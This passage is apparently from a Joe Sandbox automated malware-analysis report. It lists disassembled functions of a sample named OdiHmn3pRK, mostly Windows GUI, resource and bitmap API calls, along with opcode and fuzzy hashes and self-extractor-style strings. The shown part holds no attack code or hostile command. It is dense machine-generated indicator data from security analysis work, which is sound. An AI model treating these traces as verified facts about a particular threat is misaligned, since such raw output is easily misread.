                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                                                                  • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle$|wA
                                                                  • API String ID: 2725485552-3187639848
                                                                  • Opcode ID: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                                                  • Instruction ID: a5d789275b7dd46d140941e9fd319bf554fc7ea6ad5da08365fcb0f0a182a74d
                                                                  • Opcode Fuzzy Hash: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                                                  • Instruction Fuzzy Hash: 4251B5F1A402047EDB10BB619D86EFF36ACDA85308B64443BF904F32C1E6BC5E854A6D
                                                                  APIs
                                                                  • GetClassNameA.USER32(?,?,00000040), ref: 00402DD3
                                                                  • lstrcmpiA.KERNEL32(?,STATIC), ref: 00402DE6
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00402DF3
                                                                    • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                    • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                    • Part of subcall function 00401A85: CharUpperW.USER32(?,74DEE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                    • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402E20
                                                                  • GetParent.USER32(?), ref: 00402E2E
                                                                  • LoadLibraryA.KERNEL32(riched20), ref: 00402E42
                                                                  • GetMenu.USER32(?), ref: 00402E55
                                                                  • SetThreadLocale.KERNEL32(00000419), ref: 00402E62
                                                                  • CreateWindowExW.USER32(00000000,RichEdit20W,0041335C,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 00402E92
                                                                  • DestroyWindow.USER32(?), ref: 00402EA3
                                                                  • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00402EB8
                                                                  • GetSysColor.USER32(0000000F), ref: 00402EBC
                                                                  • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00402ECA
                                                                  • SendMessageW.USER32(00000000,00000461,?,?), ref: 00402EF5
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402EFA
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402F02
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: Window$??3@MessageSend$CharTextUpper$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                                                  • String ID: RichEdit20W$STATIC$riched20${\rtf
                                                                  • API String ID: 1731037045-2281146334
                                                                  • Opcode ID: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                                                  • Instruction ID: c7c9ca1f65d7473fe19c29f8272bdbb18bb8b251efb89c9ee4785ec66c96c850
                                                                  • Opcode Fuzzy Hash: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                                                  • Instruction Fuzzy Hash: FE316072A40119BFDB01AFA5DD49DEF7BBCEF08745F104036F601B21D1DA789A008B68
                                                                  APIs
                                                                  • GetWindowDC.USER32(00000000), ref: 00401CD4
                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                                                  • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                                                  • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                                                  • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                                                  • CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                                                  • CreateCompatibleDC.GDI32(?), ref: 00401D52
                                                                  • SelectObject.GDI32(00000000,?), ref: 00401D60
                                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                                                  • SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                                                  • GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                                                  • SelectObject.GDI32(00000000,?), ref: 00401DB3
                                                                  • SelectObject.GDI32(00000000,?), ref: 00401DB9
                                                                  • DeleteDC.GDI32(00000000), ref: 00401DC2
                                                                  • DeleteDC.GDI32(00000000), ref: 00401DC5
                                                                  • ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                                                  • ReleaseDC.USER32(00000000,?), ref: 00401DDB
                                                                  • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401DE8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                                  • String ID:
                                                                  • API String ID: 3462224810-0
                                                                  • Opcode ID: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                                                  • Instruction ID: 24730f8ff9b6a3f8d7f0600a39c6f646a54ca28d21b12e05547a6914d757f366
                                                                  • Opcode Fuzzy Hash: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                                                  • Instruction Fuzzy Hash: 00313976D00208BBDF215FA19C48EEFBFBDEB48752F108066F604B21A0C6758A50EB64
                                                                  APIs
                                                                  • GetClassNameA.USER32(?,?,00000040), ref: 00401E05
                                                                  • lstrcmpiA.KERNEL32(?,STATIC), ref: 00401E1C
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00401E2F
                                                                  • GetMenu.USER32(?), ref: 00401E44
                                                                    • Part of subcall function 00401BDF: GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                                                    • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                                                    • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                                                    • Part of subcall function 00401BDF: SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                                                    • Part of subcall function 00401BDF: LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                                                    • Part of subcall function 00401BDF: LockResource.KERNEL32(00000000), ref: 00401C41
                                                                  • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00401E76
                                                                  • memcpy.MSVCRT(00000000,00000000,00000010), ref: 00401E83
                                                                  • CoInitialize.OLE32(00000000), ref: 00401E8C
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00401E98
                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00414C14,?), ref: 00401EBD
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00401ECD
                                                                    • Part of subcall function 00401CC8: GetWindowDC.USER32(00000000), ref: 00401CD4
                                                                    • Part of subcall function 00401CC8: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                                                    • Part of subcall function 00401CC8: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                                                    • Part of subcall function 00401CC8: GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                                                    • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                                                    • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                                                    • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                                                    • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D52
                                                                    • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401D60
                                                                    • Part of subcall function 00401CC8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                                                    • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                                                    • Part of subcall function 00401CC8: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                                                    • Part of subcall function 00401CC8: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                                                    • Part of subcall function 00401CC8: GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                                                    • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB3
                                                                    • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB9
                                                                    • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC2
                                                                    • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC5
                                                                    • Part of subcall function 00401CC8: ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00401EFF
                                                                  • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 00401F13
                                                                  • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 00401F25
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00401F3A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                                                  • String ID: IMAGES$STATIC
                                                                  • API String ID: 4202116410-1168396491
                                                                  • Opcode ID: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                                                  • Instruction ID: 08c73d75f8249df6a552952f3d33af28cabbedea74541c6d0cfd8ce2793c0c4e
                                                                  • Opcode Fuzzy Hash: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                                                  • Instruction Fuzzy Hash: C7417C71A00218BFCB11DFA1DC49DEEBF7DEF08742B008076FA05A61A0DB758A41DB68
                                                                  APIs
                                                                    • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                    • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                  • GetDlgItem.USER32(?,000004B8), ref: 0040816A
                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408179
                                                                  • GetDlgItem.USER32(?,000004B5), ref: 004081C0
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 004081C5
                                                                  • GetDlgItem.USER32(?,000004B5), ref: 004081D5
                                                                  • SetWindowLongW.USER32(00000000), ref: 004081D8
                                                                  • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 004081FE
                                                                  • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408210
                                                                  • GetDlgItem.USER32(?,000004B4), ref: 0040821A
                                                                  • SetFocus.USER32(00000000), ref: 0040821D
                                                                  • SetTimer.USER32(?,00000001,00000000,00000000), ref: 0040824C
                                                                  • CoCreateInstance.OLE32(00414C34,00000000,00000001,00414808,00000000), ref: 00408277
                                                                  • GetDlgItem.USER32(?,00000002), ref: 00408294
                                                                  • IsWindow.USER32(00000000), ref: 00408297
                                                                  • GetDlgItem.USER32(?,00000002), ref: 004082A7
                                                                  • EnableWindow.USER32(00000000), ref: 004082AA
                                                                  • GetDlgItem.USER32(?,000004B5), ref: 004082BE
                                                                  • ShowWindow.USER32(00000000), ref: 004082C1
                                                                    • Part of subcall function 00407134: GetDlgItem.USER32(?,000004B6), ref: 00407142
                                                                    • Part of subcall function 00407B33: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
                                                                    • Part of subcall function 00407B33: GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                                                    • Part of subcall function 00407B33: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                                                    • Part of subcall function 00407B33: wsprintfW.USER32 ref: 00407BBB
                                                                    • Part of subcall function 00407B33: ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                                                                    • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                    • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                                                    • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                    • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                    • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                    • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                                                    • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                    • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                    • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                                                    • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: Item$Window$MessageSend$System$EnableHandleLoadLongMenuMetricsModuleShow$??3@CreateFocusIconImageInstanceTimerUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                  • String ID:
                                                                  • API String ID: 855516470-0
                                                                  • Opcode ID: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                                                  • Instruction ID: 3ce0214ef3d03b0ee840dd4ab9c121ae631e901bc0d6870238ad5b6e85178a64
                                                                  • Opcode Fuzzy Hash: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                                                  • Instruction Fuzzy Hash: 014174B0644748ABDA206F65DD49F5B7BADEB40B05F00847DF552A62E1CB79B800CA1C
                                                                  APIs
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,hAA,00000000), ref: 004030F6
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,hAA,00000000), ref: 004030FE
                                                                  • strncmp.MSVCRT ref: 004031F1
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00403255
                                                                  • lstrcmpW.KERNEL32(?,SetEnvironment,00000000), ref: 00403273
                                                                  • ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$lstrcmpstrncmp
                                                                  • String ID: GUIFlags$MiscFlags$SetEnvironment$hAA${\rtf
                                                                  • API String ID: 2881732429-172299233
                                                                  • Opcode ID: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                                                  • Instruction ID: da55d09168dcf28f6e950782b6654b171f18f9ca5632fa18d2c46afc5d57570a
                                                                  • Opcode Fuzzy Hash: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                                                  • Instruction Fuzzy Hash: 23819D31900218ABDF11DFA1CD55BEE7B78AF14305F1040ABE8017B2E6DB78AB05DB59
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000004B3), ref: 00406A69
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00406A6E
                                                                  • GetDlgItem.USER32(?,000004B4), ref: 00406AA5
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00406AAA
                                                                  • GetSystemMetrics.USER32(00000010), ref: 00406B0B
                                                                  • GetSystemMetrics.USER32(00000011), ref: 00406B11
                                                                  • GetSystemMetrics.USER32(00000008), ref: 00406B18
                                                                  • GetSystemMetrics.USER32(00000007), ref: 00406B1F
                                                                  • GetParent.USER32(?), ref: 00406B43
                                                                  • GetClientRect.USER32(00000000,?), ref: 00406B55
                                                                  • ClientToScreen.USER32(?,?), ref: 00406B68
                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00406BCE
                                                                  • GetClientRect.USER32(?,?), ref: 00406C55
                                                                  • ClientToScreen.USER32(?,?), ref: 00406B71
                                                                    • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                                                  • GetSystemMetrics.USER32(00000008), ref: 00406CD6
                                                                  • GetSystemMetrics.USER32(00000007), ref: 00406CDD
                                                                    • Part of subcall function 00406A18: GetDlgItem.USER32(?,?), ref: 00406A36
                                                                    • Part of subcall function 00406A18: SetWindowPos.USER32(00000000), ref: 00406A3D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                                                  • String ID:
                                                                  • API String ID: 747815384-0
                                                                  • Opcode ID: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                                                  • Instruction ID: 701d8c843d4ec3579feae24e97f284edc15b0bac0439a5efdbaa5111af673c9b
                                                                  • Opcode Fuzzy Hash: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                                                  • Instruction Fuzzy Hash: 7B912D71A00209AFDB14DFB9CD85AEEB7F9EF48704F148529E642F6290D778E9008B64
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                  • LoadIconW.USER32(00000000), ref: 00407D33
                                                                  • GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                  • GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                  • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                  • LoadImageW.USER32(00000000), ref: 00407D54
                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                  • SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                  • GetWindow.USER32(?,00000005), ref: 00407E76
                                                                  • GetWindow.USER32(?,00000005), ref: 00407E92
                                                                  • GetWindow.USER32(?,00000005), ref: 00407EAA
                                                                  • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,0040803E), ref: 00407F0A
                                                                  • LoadIconW.USER32(00000000), ref: 00407F0D
                                                                  • GetDlgItem.USER32(?,000004B1), ref: 00407F28
                                                                  • SendMessageW.USER32(00000000), ref: 00407F2F
                                                                    • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                                                    • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                                                    • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                    • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: Window$HandleItemLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                                                  • String ID:
                                                                  • API String ID: 1889686859-0
                                                                  • Opcode ID: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                                                                  • Instruction ID: b6a50195b8a608de49edc5b96f3e83ee8a9b90890169e94b1220211b89b9884f
                                                                  • Opcode Fuzzy Hash: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                                                                  • Instruction Fuzzy Hash: E861D47064C7096AE9257B61DC4AF3B3699AB40B05F10447FF642B92D2DBBCBC0056AF
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 00406F45
                                                                  • GetWindowLongW.USER32(00000000), ref: 00406F4C
                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 00406F62
                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 00406F7F
                                                                  • GetSystemMetrics.USER32(00000031), ref: 00406F91
                                                                  • GetSystemMetrics.USER32(00000032), ref: 00406F98
                                                                  • GetWindowDC.USER32(?), ref: 00406FAA
                                                                  • GetWindowRect.USER32(?,?), ref: 00406FB7
                                                                  • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00406FEB
                                                                  • ReleaseDC.USER32(?,00000000), ref: 00406FF3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                                  • String ID:
                                                                  • API String ID: 2586545124-0
                                                                  • Opcode ID: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                                                                  • Instruction ID: b1ff7c23223d170b9333fa97acec74f2c9230ee3eabfe87d0be763292bfdf634
                                                                  • Opcode Fuzzy Hash: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                                                                  • Instruction Fuzzy Hash: 8E210C7650021ABFCF01AFA8DD48DDF7F69FB08351F008565FA15E21A0C775EA209B64
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000004B3), ref: 0040678E
                                                                  • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067A1
                                                                  • GetDlgItem.USER32(?,000004B4), ref: 004067AB
                                                                  • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067B3
                                                                  • SendMessageW.USER32(?,00000401,?,00000000), ref: 004067C3
                                                                  • GetDlgItem.USER32(?,?), ref: 004067CC
                                                                  • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004067D4
                                                                  • GetDlgItem.USER32(?,?), ref: 004067DD
                                                                  • SetFocus.USER32(00000000,?,000004B4,74DF0E50,00407E06,000004B4,000004B3,00000000,000004B4,00000000,000004B2,?,000004B7), ref: 004067E0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMessageSend$Focus
                                                                  • String ID:
                                                                  • API String ID: 3946207451-0
                                                                  • Opcode ID: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                                                  • Instruction ID: e7a8c5b21de344c7c4c5496bf688f1d5cc3ba414acf11b32f4788b893cc62525
                                                                  • Opcode Fuzzy Hash: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                                                  • Instruction Fuzzy Hash: 6FF04F712403087BEA212B61DD86F5BBA6EEF81B45F018425F340650F0CBF7EC109A28
                                                                  APIs
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0040C603
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@
                                                                  • String ID: IA$IA$IA$IA$IA$IA
